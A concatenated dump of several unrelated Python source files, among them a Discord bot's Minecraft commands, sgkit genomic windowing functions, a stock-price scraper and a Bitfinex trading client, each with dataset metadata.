\"a cozy home with a fireplace\", \"a secret redstone base\", \"a statue of Steve\", \"a command block creation\", \"a replica of the Statue of Liberty\",\n \"a replica of the world\", \"a statue of Alex\", \"a statue of Steve & Alex\", \"a hidden base\", \"a secret room in your house\", \"a 2x1 redstone door\", \"a 2x2 redstone door\",\n \"a 2x3 redstone door\", \"a 3x3 redstone door\", \"a flying machine\", \"a working fireplace\", \"a mansion\", \"a haunted mansion\", \"a server lobby\", \"a golf course\", \"a pirate ship\",\n \"an awesome parkour map\", \"an adventure map\", \"a cool statue of your skin\", \"a realistic model of your house\", \"pixel art of Pikachu\", \"pixel art\", \"a pvp arena\",\n \"something, idk\", \"a recreation of a meme\", \"an animation with command blocks\", \"a pvp map\", \"a dropper map\", \"a lovely survival world\", \"a giant hotel\",\n \"pixel art of Villager Bot\", \"pixel art of emeralds\", \"a giant survival base\", \"a siege-ready castle\", \"a castle and lava moat\", \"a giant tree house\", \"a giant palace\",\n \"a throne fit for a king\", \"a prison\", \"pixel art of you\", \"a statue of a sheep\", \"a statue of a cow\", \"a statue of your stuffed animal\", \"a replica of your pet\"\n \"a city block\", \"an emerald bank\", \"a fishing hole\", \"a 3 story tree house\", \"a cactus farm\", \"a wheat farm\", \"a carrot farm\", \"a floating village\", \"an auto farm\",\n \"a giant farm\", \"an igloo\", \"a sky island\", \"a giant maze\", \"a toy shop\", \"a mall\", \"a swimming pool\", \"a town hall\", \"a villager breeding machine\", \"a tree farm\",\n \"an underground garden\", \"the flag of your home country\", \"a witch farm\", \"a giant public library\", \"a storage room\", \"a bakery\", \"a mob arena\", \"a maze with deadly traps\",\n \"a mad science labratory\", \"a large volcano\", \"a dog house\", \"a cat house\", \"a city park\", \"a pacman game\", \"a tnt cannon\", \"a space ship that can fire tnt\", \"a giant cake\",\n \"a theme park\", \"a carnival\", \"a drowned farm\", \"a blacksmith\", \"a kelp farm\", \"a tavern\", \"a monorail\", \"a refugee center\", \"an escape room\", \"a greenhouse with plants\",\n \"a giant slime-block trampoline\", \"a miniature city\", \"a satellite dish\", \"an elven city\", \"an egyptian pyramid\", \"a skate park\", \"a circus\", \"the Minecraft olympics\",\n \"a redstone computer\", \"your favorite cartoon characters\", \"an ultra auth-sorting storage system\", \"a giant tnt cannon\", \"a player launcher\", \"a small town\", \"a bamboo farm\",\n \"a farm\", \"a small hut\", \"a gaming computer\", \"an x-wing fighter from Star Wars\", \"a super-big rainbow with a pot of gold at the end\", \"giant versions of blocks\", \"a meatbal\",\n \"a computer\", \"a 20 story apartment building\", \"a hospital\", \"a zombie villager curing hospital\", \"a school\", \"a viking ship\", \"a viking village\", \"some tennis courts\",\n \"a massive mine\", \"a helicopter pad\", \"a secret FBI base\", \"a secret CIA base\", \"Area 51\", \"a giant sea monster\", \"a massive cruise ship\", \"a planet\" \"the solar system\",\n \"a massive abandoned mineshaft\", \"the kraken\", \"a seafood resturant\", \"a resturant that only serves various forms of fried octopus tentacles\", \"a massive trampoline park\",\n \"a statue of a bee\", \"a giant dragon\", \"a rainbow-colored dragon\", \"a hidden enchanting table station\", \"a redstone drawbridge\", \"a dump truck\", \"a dinosaur\",\n \"a construction site\", \"a skyscraper\", \"an iPhone\", \"a humble abode\", \"a river\", \"a hobbit hole\", \"a home in a volcano\", \"a disco\", \"a creepy campsite\", \"an awesome jungle\"]\n \n self.nouns = [\"creeper\", \"cozy room with a fireplace\", \"cozy house\", \"Steve\", \"Alex\", \"your skin\", \"your favorite cartoon character\", \"pixel art of your Minecraft skin\", \"Minecraft in Minecraft\",\n \"command block creation\", \"replica of the Statue of Liberty\", \"replica of the world\", \"statue of Steve & Alex\", \"statue of your favorite stuffed animal\", \"cruise ship\",\n \"dinosaur\", \"bee\", \"survival base\", \"castle\", \"castle with a moat\", \"blacksmithery\", \"bakery\", \"x-wing fighter\", \"area 51\", \"redstone drawbridge\", \"dump truck\", \"tennis courts\",\n \"model of a solar system\", \"dog house\", \"villager\", \"statue of a villager\", \"giant sea monster\", \"viking ship\", \"carrot farm\", \"player launcher\", \"tnt cannon\", \"pacman pixel art\",\n \"tree house\", \"tree farm\", \"floating village\", \"town hall\", \"storage room\", \"mall\", \"swimming pool\", \"monorail\", \"mansion\", \"fireplace\", \"hidden room\", \"survival world\", \"hotel\",\n \"throne room\", \"throne for a king\", \"sky island\", \"volcano\", \"hospital\", \"CIA base\", \"hobbit hole\", \"mountain\", \"river\", \"winding river\", \"hydroelectric dam\", \"power plant\",\n \"labratory\", \"mad science labratory\", \"skyscraper\", \"dragon\", \"resturant\", \"helicopter pad\", \"helicopter\", \"vehicle\", \"trampoline\", \"trampoline park\", \"town\", \"farm\", \"PvP arena\",\n \"dropper map\", \"PvE arena\", \"kraken\", \"phone\", \"smart phone\", \"public library\", \"secret library\", \"toy shop\", \"maze\", \"winding maze\", \"underground garden\", \"emerald bank\",\n \"golf course\", \"tavern\", \"road\", \"super-highway\", \"home\", \"mob arena\", \"arena\", \"city park\", \"playground\", \"octopus\", \"rabbit\", \"dog\", \"cat\", \"sheep\", \"cow\", \"camel\", \"pig\",\n \"wandering villager\", \"villager\", \"wither\", \"ender dragon\", \"statue of a wither\", \"statue of an ender dragon\", \"statue of an octopus\", \"statue of a dog\", \"palace\", \"pyramid\",\n \"egyptian tomb\", \"theme park\", \"computer\", \"adventure map\", \"moat\", \"pirate ship\", \"cruise-liner\", \"carrot\", \"hidden enchanting table station\", \"skate park\", \"virus\", \"camp site\",\n \"iPhone\", \"T.V.\", \"apartment building\", \"mineshaft\", \"gaming computer\", \"bakery\"]\n self.colors = [\"red-colored\", \"orange-colored\", \"yellow-colored\", \"green-colored\", \"blue-colored\", \"indigo-colored\", \"violet-colored\", \"grey\", \"black\", \"purple\", \"white\", \"brown\"]\n self.sizes = [\"normal sized\", \"normally sized\", \"large\", \"massive\", \"huge\", \"gigantic\", \"tiny\", \"small\", \"microscopic\", \"normal sized\"]\n\n def cog_unload(self):\n self.bot.loop.create_task(self.stop_ses())\n\n async def stop_ses(self):\n await self.ses.stop()\n\n @commands.command(name=\"mcping\") # Pings a java edition minecraft server\n async def mc_ping(self, ctx, *, server: str):\n await ctx.trigger_typing()\n server = server.replace(\" \", \"\")\n if \":\" in server:\n s = server.split(\":\")\n try:\n int(s[1])\n except Exception:\n await ctx.send(embed=discord.Embed(color=discord.Color.green(), description=\"**\"+server+\"** is either offline or unavailable at the moment.\\n\" +\n \"Did you type the ip and port correctly? (Like ip:port)\\n\\nExample: ``\"+ctx.prefix+\"mcping 172.10.17.177:25565``\"))\n return\n if server == \"\":\n await ctx.send(embed=discord.Embed(color=discord.Color.green(), description=\"You must specify a server to ping!\"))\n return\n status = MinecraftServer.lookup(server)\n try:\n status = status.status()\n await ctx.send(embed=discord.Embed(color=discord.Color.green(), description=server+\" is online with {0} player(s) and a ping of {1} ms.\".format(status.players.online, status.latency)))\n except Exception:\n await ctx.send(embed=discord.Embed(color=discord.Color.green(), description=\"**\"+server+\"** is either offline or unavailable at the moment.\\n\" +\n \"Did you type the ip and port correctly? (Like ip:port)\\n\\nExample: ``\"+ctx.prefix+\"mcping 172.10.17.177:25565``\"))\n\n @commands.command(name=\"mcpeping\", aliases=[\"mcbeping\"])\n async def bedrock_ping(self, ctx, server: str):\n ping = UNCONNECTED_PING()\n ping.pingID = 4201\n ping.encode()\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.setblocking(0)\n try:\n s.sendto(ping.buffer, (socket.gethostbyname(server), 19132))\n await asyncio.sleep(.75)\n recvData = s.recvfrom(2048)\n except BlockingIOError:\n await ctx.send(embed=discord.Embed(color=discord.Color.green(), description=\"**\"+server+\"** is either offline or unavailable at the moment. Did you type the ip correctly?\"))\n return\n except socket.gaierror:\n await ctx.send(embed=discord.Embed(color=discord.Color.green(), description=\"**\"+server+\"** is either offline or unavailable at the moment. Did you type the ip correctly?\"))\n return\n pong = UNCONNECTED_PONG()\n pong.buffer = recvData[0]\n pong.decode()\n sInfo = str(pong.serverName)[2:-2].split(\";\")\n pCount = sInfo[4]\n await ctx.send(embed=discord.Embed(color=discord.Color.green(), description=server+\" is online with \"+pCount+\" player(s).\"))\n\n @commands.command(name=\"stealskin\", aliases=[\"skinsteal\", \"skin\"])\n @commands.cooldown(1, 2.5, commands.BucketType.user)\n async def skinner(self, ctx, *, gamertag: str):\n response = await self.ses.get(\"https://api.mojang.com/users/profiles/minecraft/\"+gamertag)\n if response.status == 204:\n await ctx.send(embed=discord.Embed(color=discord.Color.green(), description=\"That player doesn't exist!\"))\n return\n uuid = json.loads(await response.text())[\"id\"]\n response = await self.ses.get(\"https://sessionserver.mojang.com/session/minecraft/profile/\"+str(uuid)+\"?unsigned=false\")\n content = json.loads(await response.text())\n if \"error\" in content:\n if content[\"error\"] == \"TooManyRequestsException\":\n await ctx.send(embed=discord.Embed(color=discord.Color.green(), description=\"Hey! Slow down!\"))\n return\n undec = base64.b64decode(content[\"properties\"][0][\"value\"])\n try:\n url = json.loads(undec)[\"textures\"][\"SKIN\"][\"url\"]\n except Exception:\n await ctx.send(embed=discord.Embed(color=discord.Color.green(), description=\"An error occurred while fetching that skin!\"))\n return\n skinEmbed = discord.Embed(color=discord.Color.green(), description=gamertag+\"'s skin\\n[**[Download]**](\"+url+\")\")\n skinEmbed.set_thumbnail(url=url)\n skinEmbed.set_image(url=\"https://mc-heads.net/body/\"+gamertag)\n await ctx.send(embed=skinEmbed)\n\n @commands.command(name=\"nametouuid\", aliases=[\"uuid\", \"getuuid\"])\n @commands.cooldown(1, 1, commands.BucketType.user)\n async def get_uuid(self, ctx, *, gamertag: str):\n r = await self.ses.post(\"https://api.mojang.com/profiles/minecraft\", json=[gamertag])\n j = json.loads(await r.text()) # [0]['id']\n if j == []:\n await ctx.send(embed=discord.Embed(color=discord.Color.green(), description=\"That user could not be found.\"))\n return\n await ctx.send(embed=discord.Embed(color=discord.Color.green(), description=f\"{gamertag}: ``{j[0]['id']}``\"))\n\n @commands.command(name=\"uuidtoname\", aliases=[\"getgamertag\"])\n @commands.cooldown(1, 1, commands.BucketType.user)\n async def get_gamertag(self, ctx, *, uuid: str):\n response = await self.ses.get(f\"https://api.mojang.com/user/profiles/{uuid}/names\")\n if response.status == 204:\n await ctx.send(embed=discord.Embed(color=discord.Color.green(), description=\"That player doesn't exist!\"))\n return\n j = json.loads(await response.text())\n name = j[len(j)-1][\"name\"]\n await ctx.send(embed=discord.Embed(color=discord.Color.green(), description=f\"{uuid}: ``{name}``\"))\n\n @commands.command(name=\"mcsales\", aliases=[\"minecraftsales\"])\n @commands.cooldown(1, 1, commands.BucketType.user)\n async def mc_sales(self, ctx):\n r = await self.ses.post(\"https://api.mojang.com/orders/statistics\", json={\"metricKeys\": [\"item_sold_minecraft\", \"prepaid_card_redeemed_minecraft\"]})\n j = json.loads(await r.text())\n await ctx.send(embed=discord.Embed(color=discord.Color.green(), description=f\"**{j['total']}** total Minecraft copies sold, **{round(j['saleVelocityPerSeconds'], 3)}** copies sold per second.\"))\n\n @commands.command(name=\"randomserver\", aliases=[\"randommc\", \"randommcserver\", \"mcserver\", \"minecraftserver\"])\n async def random_mc_server(self, ctx):\n s = choice(self.g.mcServers)\n try:\n online = MinecraftServer.lookup(s['ip']+\":\"+str(s['port'])).status()\n stat = \"<:online:692764696075304960>\"\n except Exception:\n stat = \"<:offline:692764696431951872>\"\n await ctx.send(embed=discord.Embed(color=discord.Color.green(), description=f\"{stat} \\uFEFF ``{s['ip']}:{s['port']}`` {s['version']} ({s['type']})\\n{s['note']}\"))\n\n @commands.command(name=\"buildidea\", aliases=[\"idea\"])\n async def build_idea(self, ctx):\n if choice([True, False]):\n await ctx.send(embed=discord.Embed(color=discord.Color.green(), description=f\"{choice(self.first)} {choice(self.prenouns)}{choice(['!', ''])}\"))\n else:\n await ctx.send(embed=discord.Embed(color=discord.Color.green(), description=f\"{choice(self.first)} a {choice(self.sizes)}, {choice(self.colors)} {choice(self.nouns)}{choice(['!', ''])}\"))\n\n @commands.command(name=\"colorcodes\", aliases=[\"mccolorcodes\", \"colors\", \"cc\"])\n async def mc_color_codes(self, ctx):\n embed = discord.Embed(color=discord.Color.green(), description=\"Text in Minecraft can be formatted using different codes and\\nthe section (``§``) sign.\")\n embed.set_author(name=\"Minecraft Formatting Codes\")\n embed.add_field(name=\"Color Codes\", value=\"<:red:697541699706028083> **Red** ``§c``\\n\"\n \"<:yellow:697541699743776808> **Yellow** ``§e``\\n\"\n \"<:green:697541699316219967> **Green** ``§a``\\n\"\n \"<:aqua:697541699173613750> **Aqua** ``§b``\\n\"\n \"<:blue:697541699655696787> **Blue** ``§9``\\n\"\n \"<:light_purple:697541699546775612> **Light Purple** ``§d``\\n\"\n \"<:white:697541699785719838> **White** ``§f``\\n\"\n \"<:gray:697541699534061630> **Gray** ``§7``\\n\")\n embed.add_field(name=\"Color Codes\", value=\"<:dark_red:697541699488055426> **Dark Red** ``§4``\\n\"\n \"<:gold:697541699639050382> **Gold** ``§6``\\n\"\n \"<:dark_green:697541699500769420> **Dark Green** ``§2``\\n\"\n \"<:dark_aqua:697541699475472436> **Dark Aqua** ``§3``\\n\"\n \"<:dark_blue:697541699488055437> **Dark Blue** ``§1``\\n\"\n \"<:dark_purple:697541699437592666> **Dark Purple** ``§5``\\n\"\n \"<:dark_gray:697541699471278120> **Dark Gray** ``§8``\\n\"\n \"<:black:697541699496444025> **Black** ``§0``\\n\")\n embed.add_field(name=\"Formatting Codes\", value=\"<:bold:697541699488186419> **Bold** ``§l``\\n\"\n \"<:strikethrough:697541699768942711> ~~Strikethrough~~ ``§m``\\n\"\n \"<:underline:697541699806953583> __Underline__ ``§n``\\n\"\n \"<:italic:697541699152379995> *Italic* ``§o``\\n\"\n \"<:obfuscated:697541699769204736> ||Obfuscated|| ``§k``\\n\"\n \"<:reset:697541699697639446> Reset ``§r``\\n\")\n await ctx.send(embed=embed)\n\n\n\ndef setup(bot):\n bot.add_cog(Minecraft(bot))\n","sub_path":"cogs/commands/mc.py","file_name":"mc.py","file_ext":"py","file_size_in_byte":16684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"362898657","text":"from typing import Any, Callable, Iterable, Optional, Tuple, Union\n\nimport dask.array as da\nimport numpy as np\nfrom xarray import Dataset\n\nfrom sgkit.utils import conditional_merge_datasets\nfrom sgkit.variables import window_contig, window_start, window_stop\n\nfrom .typing import ArrayLike, DType\n\n# Window definition (user code)\n\n\ndef window(\n ds: Dataset,\n size: int,\n step: Optional[int] = None,\n merge: bool = True,\n) -> Dataset:\n \"\"\"Add fixed-size windowing information to a dataset.\n\n Windows are defined over the ``variants`` dimension, and are\n used by some downstream functions to calculate statistics for\n each window.\n\n Parameters\n ----------\n ds\n Genotype call dataset.\n size\n The window size (number of variants).\n step\n The distance (number of variants) between start positions of windows.\n Defaults to ``size``.\n merge\n If True (the default), merge the input dataset and the computed\n output variables into a single dataset, otherwise return only\n the computed output variables.\n See :ref:`dataset_merge` for more details.\n\n Returns\n -------\n A dataset containing the following variables:\n\n - :data:`sgkit.variables.window_start_spec` (windows):\n The index values of window start positions.\n - :data:`sgkit.variables.window_stop_spec` (windows):\n The index values of window stop positions.\n \"\"\"\n step = step or size\n n_variants = ds.dims[\"variants\"]\n n_contigs = len(ds.attrs[\"contigs\"])\n contig_ids = np.arange(n_contigs)\n variant_contig = ds[\"variant_contig\"]\n contig_starts = np.searchsorted(variant_contig.values, contig_ids)\n contig_bounds = np.append(contig_starts, [n_variants], axis=0)\n\n contig_window_contigs = []\n contig_window_starts = []\n contig_window_stops = []\n for i in range(n_contigs):\n starts, stops = _get_windows(contig_bounds[i], contig_bounds[i + 1], size, step)\n contig_window_starts.append(starts)\n contig_window_stops.append(stops)\n contig_window_contigs.append(np.full_like(starts, i))\n\n window_contigs = np.concatenate(contig_window_contigs)\n window_starts = np.concatenate(contig_window_starts)\n window_stops = np.concatenate(contig_window_stops)\n\n new_ds = Dataset(\n {\n window_contig: (\n \"windows\",\n window_contigs,\n ),\n window_start: (\n \"windows\",\n window_starts,\n ),\n window_stop: (\n \"windows\",\n window_stops,\n ),\n }\n )\n return conditional_merge_datasets(ds, new_ds, merge)\n\n\ndef _get_windows(\n start: int, stop: int, size: int, step: int\n) -> Tuple[ArrayLike, ArrayLike]:\n # Find the indexes for the start positions of all windows\n window_starts = np.arange(start, stop, step)\n window_stops = np.clip(window_starts + size, start, stop)\n return window_starts, window_stops\n\n\n# Computing statistics for windows (internal code)\n\n\ndef has_windows(ds: Dataset) -> bool:\n \"\"\"Test if a dataset has windowing information.\"\"\"\n return window_start in ds and window_stop in ds\n\n\ndef moving_statistic(\n values: ArrayLike,\n statistic: Callable[..., ArrayLike],\n size: int,\n step: int,\n dtype: DType,\n **kwargs: Any,\n) -> da.Array:\n \"\"\"A Dask implementation of scikit-allel's moving_statistic function.\"\"\"\n length = values.shape[0]\n chunks = values.chunks[0]\n if len(chunks) > 1:\n min_chunksize = np.min(chunks[:-1]) # ignore last chunk\n else:\n min_chunksize = np.min(chunks)\n if min_chunksize < size:\n raise ValueError(\n f\"Minimum chunk size ({min_chunksize}) must not be smaller than size ({size}).\"\n )\n window_starts, window_stops = _get_windows(0, length, size, step)\n return window_statistic(\n values, statistic, window_starts, window_stops, dtype, **kwargs\n )\n\n\ndef window_statistic(\n values: ArrayLike,\n statistic: Callable[..., ArrayLike],\n window_starts: ArrayLike,\n window_stops: ArrayLike,\n dtype: DType,\n chunks: Any = None,\n new_axis: Union[None, int, Iterable[int]] = None,\n **kwargs: Any,\n) -> da.Array:\n\n values = da.asarray(values)\n desired_chunks = chunks or values.chunks\n\n window_lengths = window_stops - window_starts\n depth = np.max(window_lengths)\n\n # Dask will raise an error if the last chunk size is smaller than the depth\n # Workaround by rechunking to combine the last two chunks in first axis\n # See https://github.com/dask/dask/issues/6597\n if depth > values.chunks[0][-1]:\n chunk0 = values.chunks[0]\n new_chunk0 = tuple(list(chunk0[:-2]) + [chunk0[-2] + chunk0[-1]])\n values = values.rechunk({0: new_chunk0})\n\n chunks = values.chunks[0]\n\n rel_window_starts, windows_per_chunk = _get_chunked_windows(\n chunks, window_starts, window_stops\n )\n\n # Add depth for map_overlap\n rel_window_starts = rel_window_starts + depth\n rel_window_stops = rel_window_starts + window_lengths\n\n chunk_offsets = _sizes_to_start_offsets(windows_per_chunk)\n\n def blockwise_moving_stat(x: ArrayLike, block_info: Any = None) -> ArrayLike:\n if block_info is None or len(block_info) == 0:\n return np.array([])\n chunk_number = block_info[0][\"chunk-location\"][0]\n chunk_offset_start = chunk_offsets[chunk_number]\n chunk_offset_stop = chunk_offsets[chunk_number + 1]\n chunk_window_starts = rel_window_starts[chunk_offset_start:chunk_offset_stop]\n chunk_window_stops = rel_window_stops[chunk_offset_start:chunk_offset_stop]\n out = np.array(\n [\n statistic(x[i:j], **kwargs)\n for i, j in zip(chunk_window_starts, chunk_window_stops)\n ]\n )\n return out\n\n if values.ndim == 1:\n new_chunks = (tuple(windows_per_chunk),)\n else:\n # depth is 0 except in first axis\n depth = {0: depth}\n # new chunks are same except in first axis\n new_chunks = tuple([tuple(windows_per_chunk)] + list(desired_chunks[1:])) # type: ignore\n return values.map_overlap(\n blockwise_moving_stat,\n dtype=dtype,\n chunks=new_chunks,\n depth=depth,\n boundary=0,\n trim=False,\n new_axis=new_axis,\n )\n\n\ndef _sizes_to_start_offsets(sizes: ArrayLike) -> ArrayLike:\n \"\"\"Convert an array of sizes, to cumulative offsets, starting with 0\"\"\"\n return np.cumsum(np.insert(sizes, 0, 0, axis=0))\n\n\ndef _get_chunked_windows(\n chunks: ArrayLike,\n window_starts: ArrayLike,\n window_stops: ArrayLike,\n) -> Tuple[ArrayLike, ArrayLike]:\n \"\"\"Find the window start positions relative to the start of the chunk they are in,\n and the number of windows in each chunk.\"\"\"\n\n # Find the indexes for the start positions of all chunks\n chunk_starts = _sizes_to_start_offsets(chunks)\n\n # Find which chunk each window falls in\n chunk_numbers = np.searchsorted(chunk_starts, window_starts, side=\"right\") - 1\n\n # Find the start positions for each window relative to each chunk start\n rel_window_starts = window_starts - chunk_starts[chunk_numbers]\n\n # Find the number of windows in each chunk\n unique_chunk_numbers, unique_chunk_counts = np.unique(\n chunk_numbers, return_counts=True\n )\n windows_per_chunk = np.zeros_like(chunks)\n windows_per_chunk[unique_chunk_numbers] = unique_chunk_counts # set non-zero counts\n\n return rel_window_starts, windows_per_chunk\n","sub_path":"sgkit/window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":7598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"583528767","text":"import json\n\nwith open('E:\\states.json') as f:\n data=json.load(f)\n\n for state in data['states']:\n del state['area_codes']\n print(state)\n\n with open('E:\\states2.json','w') as f:\n json.dump(data,f)\n ","sub_path":"sum/com/naresh/fileOperations.py","file_name":"fileOperations.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"125838042","text":"for _ in range(int(input())):\n\tn=int(input())\n\tarr=[int(i) for i in input().split()]\n\tsumi=sum(arr)\n\tif 0 not in arr:\n\t\tprint(-1)\n\t\tcontinue\n\tarr.sort()\n\tif sumi%3!=0:\n\t\tx=sumi%3\n\t\tchk=0\n\t\tfor i in range(len(arr)):\n\t\t\tif arr[i]%3==x:\n\t\t\t\tarr.pop(i)\n\t\t\t\tchk=1\n\t\t\t\tbreak\n\t\tif chk==0:\n\t\t\tfor i in range(len(arr)):\n\t\t\t\tif arr[i]%3==1:\n\t\t\t\t\trem=[i]\n\t\t\t\t\tk=i+1\n\t\t\t\t\twhile k|]+'\nBRAND_CODE_PARAMETER = 'stock/[0-9]+'\nPAGE_PARAMETER = '\\?page=[0-9]+'\nBRAND_CODE_AND_YEAR_PARAMETER = 'stock/[0-9]+/[0-9]+'\n\n\ndef __GetExistBrandDictionary():\n existBrandDDict = {}\n for csvFile in glob(CSVFILE_STORE_FOLDER_NAME + '//*' + CSVFILE_EXTENSION):\n csvFileName = os.path.splitext(os.path.basename(csvFile))[0]\n\n if csvFileName in existBrandDDict:\n continue\n\n existBrandDDict[csvFileName] = pd.read_csv(csvFile, encoding='UTF-8')\n\n return existBrandDDict\n\n\ndef __GetBrandCodeFromCSVFile(csvFile):\n csvFileName = os.path.splitext(os.path.basename(csvFile))[0]\n companyNameFromCSVFile = re.search(' .*', csvFileName)[0]\n return csvFileName.replace(companyNameFromCSVFile, '')\n\n\ndef __stripInvalidCharacterFromFileName(fileName):\n return re.sub(CSV_NAME_UNUSABLE_WORDS, '', fileName)\n\n\ndef __DeleteDisappearedBrandCSV(existBrandDDict, brandOnWeb):\n for brand in existBrandDDict.keys():\n if brand not in brandOnWeb:\n os.remove(CSVFILE_STORE_FOLDER_NAME + '//' + brand + CSVFILE_EXTENSION)\n\n\ndef __GetExistBrandStockPriceDataFrame(urlTag, existBrandDDict, csvFileName):\n\n latestStockPriceDataFrame = pd.read_html(urlTag.attrs['href'])[0]\n time.sleep(1)\n mergedStockPriceDataFrame = pd.concat([latestStockPriceDataFrame, existBrandDDict[csvFileName]])\n mergedStockPriceDataFrame.drop_duplicates(inplace=True)\n\n return mergedStockPriceDataFrame\n\n\ndef __GetAllDayStockPriceDataFrame(urlTag):\n individualStockPriceDataFrame = pd.DataFrame(None)\n\n response_IndividualStockPricePerYear = request.urlopen(urlTag.attrs['href'])\n bs_GetIndividualStockPricePerYear = BeautifulSoup(response_IndividualStockPricePerYear, 'html.parser')\n time.sleep(1)\n\n for individualStockPricePerYearTag in bs_GetIndividualStockPricePerYear.find_all(\"a\", href=re.compile(BRAND_CODE_AND_YEAR_PARAMETER)):\n individualStockPriceFromHtml = pd.read_html(individualStockPricePerYearTag.attrs['href'])\n\n if individualStockPriceFromHtml is None:\n continue\n\n individualStockPriceDataFrame = pd.concat([individualStockPriceDataFrame, individualStockPriceFromHtml[0]])\n time.sleep(1)\n\n return individualStockPriceDataFrame\n\n\ndef ExportIndividualStockPrice():\n\n existBrandDDict = __GetExistBrandDictionary()\n brandOnWeb = []\n\n try:\n response_StockPriceTop = request.urlopen(SOURCE_URL)\n bs_GetStockPriceTop = BeautifulSoup(response_StockPriceTop, 'html.parser')\n time.sleep(1)\n\n stockPriceTopPageParameters = bs_GetStockPriceTop.find_all(\"a\", href=re.compile(PAGE_PARAMETER))\n list_allStockPricePageURL = [SOURCE_URL + stockPriceTopPageParameters[i].attrs['href'] for i in range(len(stockPriceTopPageParameters))]\n\n for idx in range(len(list_allStockPricePageURL)):\n response_IndividualStockPrice = request.urlopen(list_allStockPricePageURL[idx])\n bs_GetIndividualStockPrice = BeautifulSoup(response_IndividualStockPrice, 'html.parser')\n time.sleep(1)\n\n for urlTag in bs_GetIndividualStockPrice.find_all(\"a\", href=re.compile(BRAND_CODE_PARAMETER)):\n csvFileName = urlTag.text\n\n if csvFileName in existBrandDDict:\n outIndividualStockPriceDataFrame = __GetExistBrandStockPriceDataFrame(urlTag, existBrandDDict, csvFileName)\n else:\n outIndividualStockPriceDataFrame = __GetAllDayStockPriceDataFrame(urlTag)\n\n csvFilePath = CSVFILE_STORE_FOLDER_NAME + '\\\\' + __stripInvalidCharacterFromFileName(csvFileName) + CSVFILE_EXTENSION\n outIndividualStockPriceDataFrame.sort_values(DROP_COLUMN_NAME_DATE, inplace=True)\n outIndividualStockPriceDataFrame.to_csv(csvFilePath, index=False)\n\n brandOnWeb.append(csvFileName)\n\n except Exception as ex:\n logger.info(StockPriceCSVMessage.scrapingError + str(ex))\n return str(ex)\n\n __DeleteDisappearedBrandCSV(existBrandDDict, brandOnWeb)\n\n return None\n","sub_path":"main/stockPriceAnalize/StockPriceCSV.py","file_name":"StockPriceCSV.py","file_ext":"py","file_size_in_byte":4467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"270989177","text":"from .market import Market\nfrom decimal import Decimal\nimport time\nimport base64\nimport hmac\nimport urllib.request\nimport urllib.parse\nimport urllib.error\nimport urllib.request\nimport urllib.error\nimport urllib.parse\nimport hashlib\nimport sys\nimport json\nimport re\nimport logging\nimport config\n\n\nclass PrivateBitfinexUSD(Market):\n def __init__(self):\n super().__init__()\n self.order_url = \"https://api.bitfinex.com/v1/order/new\"\n self.balance_url = \"https://api.bitfinex.com/v1/balances\"\n self.key = config.bitfinex_apikey\n self.secret = config.bitfinex_apisecret\n self.currency = \"USD\"\n self.get_info()\n\n def _prepare_payload(self, should_sign, d):\n j = json.dumps(d)\n data = base64.standard_b64encode(j.encode('ascii'))\n\n if should_sign:\n h = hmac.new(self.secret.encode('ascii'), data, hashlib.sha384)\n signature = h.hexdigest()\n\n return {\n \"X-BFX-APIKEY\": self.key,\n \"X-BFX-SIGNATURE\": signature,\n \"X-BFX-PAYLOAD\": data,\n }\n else:\n return {\n \"X-BFX-PAYLOAD\": data,\n }\n\n def trade(self, amount, side, price):\n payload = {}\n payload[\"request\"] = \"/v1/order/new\"\n payload[\"nonce\"] = str(long(time.time() * 100000))\n headers = self._prepare_payload(True, payload)\n params = [(\"symbol\", \"btcusd\"),\n (\"amount\", float(amount)), # Decimal would be better but sometimes has issues with the JSON module...\n (\"price\", float(price)),\n (\"exchange\", \"bitfinex\"), # only BFX internal!\n (\"side\", side),\n (\"type\", \"exchange limit\")] # NOT \"limit\" - that's on margin!\n req = urllib.request.Request(\n self.order_url,\n params,\n headers)\n res = urllib.request.urlopen(req)\n # TODO: return None on error\n # TODO: make sure that the transaction actually took place\n answer = json.loads(res.read().decode('utf8'))\n print(answer)\n return \"success\"\n\n def _buy(self, amount, price):\n return self.trade(amount, \"buy\", price)\n\n def _sell(self, amount, price):\n return self.trade(amount, \"sell\", price)\n\n def withdraw(self, amount, address):\n # TODO: implement\n return None\n\n def deposit(self):\n # TODO: implement\n return None\n\n def get_info(self):\n payload = {}\n payload[\"request\"] = \"/v1/balances\"\n payload[\"nonce\"] = str(int(time.time() * 100000))\n headers = self._prepare_payload(True, payload)\n req = urllib.request.Request(\n self.balance_url,\n None,\n headers)\n res = urllib.request.urlopen(req)\n # TODO: return None on error\n answer = json.loads(res.read().decode('utf8'))\n for balance in answer:\n if balance['type'] == \"exchange\":\n if balance['currency'] == \"btc\":\n self.btc_balance = float(balance['available']) # or 'amount'?\n elif balance['currency'] == \"usd\":\n self.usd_balance = float(balance['available'])\n return 1","sub_path":"arbitrage/private_markets/bitfinexusd.py","file_name":"bitfinexusd.py","file_ext":"py","file_size_in_byte":3259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"257941501","text":"\n\n#calss header\nclass _FLUTTER():\n\tdef __init__(self,): \n\t\tself.name = \"FLUTTER\"\n\t\tself.definitions = [u'to make a series of quick delicate movements up and down or from side to side, or to cause something to do this: ', u'If your heart or stomach flutters, you feel slightly uncomfortable because you are excited or nervous: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_flutter.py","file_name":"_flutter.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"58813642","text":"'''\nmodule to define all class entities\n'''\nfrom ipware.ip import get_ip\n\nimport traceback\n\nfrom datetime import date, datetime\n\nfrom tastypie import http\nfrom tastypie.authentication import SessionAuthentication as _SessionAuthentication\nfrom tastypie.authorization import Authorization\nfrom tastypie.exceptions import 